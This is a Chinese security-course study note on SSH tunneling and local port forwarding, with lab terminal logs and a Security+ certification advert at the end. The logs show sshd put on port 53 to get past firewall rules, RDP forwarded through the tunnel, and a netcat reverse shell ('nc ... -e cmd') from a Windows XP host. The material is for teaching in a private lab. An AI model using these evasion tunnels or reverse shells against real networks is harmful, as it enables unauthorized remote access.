【安全牛学习笔记】SSH隧道和SSH本地端口转发

最新推荐文章于 2024-10-27 21:26:36 发布

weixin_33979203

最新推荐文章于 2024-10-27 21:26:36 发布

阅读量206

点赞数

CC 4.0 BY-SA版权

文章标签：运维网络 shell

原文链接：http://blog.51cto.com/11672938/1971503

本文介绍了SSH隧道的原理及应用，包括如何设置SSH本地端口转发实现远程服务访问，并展示了具体的配置步骤与实例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

SSH隧道

SSH支持双向通信隧道

- 将其他TCP端口的通信通过SSH连接来转发

- 用SSH作为传输层协议，对流量自动加解密

- 突破防火墙访问规则的限制，可用于×××

SSH本地端口转发

- 使效果类似于rinetd

- 将一本地端口与远程服务器建立隧道

SSH隧道

建立双向安全隧道

- 将其他TCP端口的通信通过SSH链接来转发

- 用SSH作为传输层协议，对流量自动加密解密

- 突破防火墙访问规则的限制，可用于×××

本地端口转发

- 本地侦听端口，访问转发到远程主机指定端口

远程端口转发

- 远程侦听端口，访问转发到本机主机指定端口

动态隧道模式

SSH本地端口转发

将一本端与远程服务器建立隧道

/etc/ssh/sshd_config

- PermitRootLogin yes

- Port 53

- PasswordAuthentication yes

service ssh restart

**** This is mOnOwall, version 1.8.1

built on Web Jan 15 13:32:38 GET 2014 for generic-pc

Visit http://mOnO.ch/wall for updates.

LAN IP address: 192.168.1.1

WAN IP address: (unknown)

Port configuration:

LAN -> em0

WLAn -> em1

mOnOwall console setup

*********************

1) Interfaces: assign network ports

2) Set up LAN IP address

3) Reset webGUI password

4) Reset to factory defaults

5) Reboot system

6) Ping host

7) Install on Hard Drive

Enter a number: 5

The firewall will reboot. This may take one minute.

Do you want to proceed? (y/n) y

The firewall is rebooting now.

root@K:~# arp -an

? (192..168.1.123) at 80:00:27:2c:11:c8 [ether] on eth0

? (192.168.1.1) at 14:75:90:21:4f:56 [ether] on eth0

root@K:~# vi /etc/ssh/sshd_config

port 53

#PermitRootLogin prohibit-password

PermitRootLogin yes

PasswordAuthentication yes

root@K:~# service ssh start

root@K:~# netstat -pautu | grep :53

tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 2960/sshd

tcp6 0 0 :::53 :::* LISTEN 2960/sshd

SSH本地端口转发

ssh -fNG -L <liste port>:<remote ip>:<remote port>

user@<ssh server> -p <ssh server port>

ssh -fNG -L <listen port>:localhost:<remote port> user@<ssh

server> -p <ssh port>

-f 后台运行程序

-N 不执行登陆shell

-g 复用访问时作为网管，支持多主机访问本地侦听端口

网管模式转发RDP、NC shell

bodhi@bodhi:~$ ssh -L 7001:192.168.1.124:80 root@192.168.110 -p 53

The authenticity of host '[192.168.1.110]:53 ([192.168.1.110):53)' can't be establishded

ECDSA key fingerprint is 6f:bf:fc:e5:d0:96:65:34:99:7d:81:06:b6:5e:44:50.

Are you sure you want to continue connectiong (yes/no)? yes

Warning: Permanently added '[192.168.1.110]:53' (ECDSA) to the list of known hosts.

root@192.168..110's password:

The programs included wiht the Kali GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /user/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

perimitted by applicatble law.

bodhi@bodhi:~$ netstat -pantu | grep 7001

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.0.1:7001 0.0.0.0:* LISTEN 2375/sshd

tcp6 0 0 ::1:7001 :::* LISTEN 2375/sshd

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -

tcp 0 0 1.1.1.10:59626 192.168.1.110:53 ESTABLISHED 2375/ssh

udp 0 0 0.0.0.0:5353 0.0.0.0:* -

udp 0 0 127.0.0.1:53 0.0.0.0:* -

udp6 0 0 :::5353 :::* -

root@K:~# openvas-stop

Stopping Openvas Services

root@K:~# service apache2 start

root@K:~# exit

logout

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -

tcp 0 0 1.1.1.10:59624 192.168.1.110:53 TIME_WAIT -

udp 0 0 0.0.0.0:5353 0.0.0.0:* -

udp 0 0 127.0.0.1:53 0.0.0.0:* -

udp6 0 0 :::5353 :::* -

bodhi@bodhi:~$ ssh -CfN -L 7001:192.168.1.124:80 root@192.168.110 -p 53

//打开连接不建立窗口，后台运行，压缩节省带宽

bodhi@bodhi:~$ ssh -CfN -L 7002:192.168.1.124:80 root@192.168.110 -p 53

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -

tcp 0 0 1.1.1.10:59628 192.168.1.110:53 ESTABLISHED 2375/ssh

tcp 0 0 1.1.1.10:59626 192.168.1.110:53 ESTABLISHED 2431/ssh

udp 0 0 0.0.0.0:5353 0.0.0.0:* -

udp 0 0 127.0.0.1:53 0.0.0.0:* -

udp6 0 0 :::5353 :::* -

bodhi@bodhi:~$ ssh -fN -L 7003:192.168.1.124:3389 root@192.168.110 -p 53

bodhi@bodhi:~$ netstat -pantu | grep :53

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -

tcp 0 0 1.1.1.10:59628 192.168.1.110:53 ESTABLISHED 2375/ssh

tcp 0 0 1.1.1.10:59624 192.168.1.110:53 ESTABLISHED 2449/ssh

tcp 0 0 1.1.1.10:59626 192.168.1.110:53 ESTABLISHED 2431/ssh

udp 0 0 0.0.0.0:5353 0.0.0.0:* -

udp 0 0 127.0.0.1:53 0.0.0.0:* -

udp6 0 0 :::5353 :::* -

bodhi@bodhi:~$ sudo apt-get install rdesktop

Reading package lists... Done

Building dependency tree

Reading state information... Done

Suggested packages:

puscd

The following NEW packages will be installed:

rdesktop

0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.

Need to get 139 kB of archives.

After this operation, 427 kB of additional disk space will be used.

Get:1 http://us.archive.ubuntu.com/ubuntu/ trusty/universe rdesktop amd64 1.7.1-1ubuntu2 [139 kB]

Fetched 139 kB in 2s (60.4 kB/s)

Selecting preciously unselected package rdesktop.

(Reading database ... 125707 files and directiories currently installed.)

Prepar to unpack .../rdesktop_1.7.1-1ubuntu2_amd64.deb ...

Unpacking rdesktop (1.7.1-1ubuntu2) ...

Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

Setting up rdesktop (1.7.1-1ubuntu2) ...

bodhi@bodhi:~$ rdesktop 127.0.0.1:7003

bodhi@bodhi:~$ netstat -pantu | grep 7003

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.0.1:7003 0.0.0.0:* LISTEN 2448/sshd

tcp6 0 0 ::1:7003 :::* LISTEN 2448/sshd

bodhi@bodhi:~$ ssh -fN -L 7004:192.168.1.124:3389 root@192.168.110 -p 53

bodhi@bodhi:~$ netstat -pantu | grep 7004

(Not all processes could be identified, non-owned proces info

will not be shown, you would have to be root to see it all)

tcp 0 0 127.0.0.1:7004 0.0.0.0:* LISTEN 2893/sshd

tcp6 0 0 ::1:7004 :::* LISTEN 2893/sshd

bodhi@bodhi:~$ rdesktop 1.1.1.10:7004

C:\>nc -nvlp 3333

listening on [any] 3333 ...

connect to [192.168.1.124] from <UNKNOWN> [192.168.1.110] 42598

Microsoft Windows XP [版本 5.1.2600]

C:\>nc 1.1.1.10 7005 -e cmd

bodhi@bodhi:~$ ssh -CfNg -L 7005:192.168.1.124:3333 root@192.168.110 -p 53

SSH本地端口转发

端口转发基于建立起来的SSH隧道，隧道中断则端口转发中断

只能在建立隧道时创建转发，不能为已有隧道增加端口转发

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？

原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白。

目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

原因二： IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。

转载于:https://blog.51cto.com/11672938/1971503